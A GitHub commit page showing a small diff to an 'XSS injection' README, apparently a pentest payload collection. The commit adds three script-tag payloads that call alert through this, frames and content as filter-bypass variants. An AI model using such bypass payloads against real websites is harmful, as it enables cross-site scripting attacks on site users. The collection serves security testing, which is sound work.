Skip to content

Commit

Permalink
Update README.md
Browse files Browse the repository at this point in the history
  • Loading branch information
rakeshmane authored Aug 7, 2017
1 parent dad26ce commit 6e42b61
Showing 1 changed file with 4 additions and 0 deletions.
4 changes: 4 additions & 0 deletions XSS injection/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -469,6 +469,10 @@ Bypass using an alternate way to execute an alert
<script>parent['alert'](1)</script>
<script>self['alert'](2)</script>
<script>top['alert'](3)</script>
<script>this['alert'](4)</script>
<script>frames['alert'](5)</script>
<script>content['alert'](6)</script>
```

Bypass using an alternate way to trigger an alert
Expand Down

0 comments on commit 6e42b61

Please sign in to comment.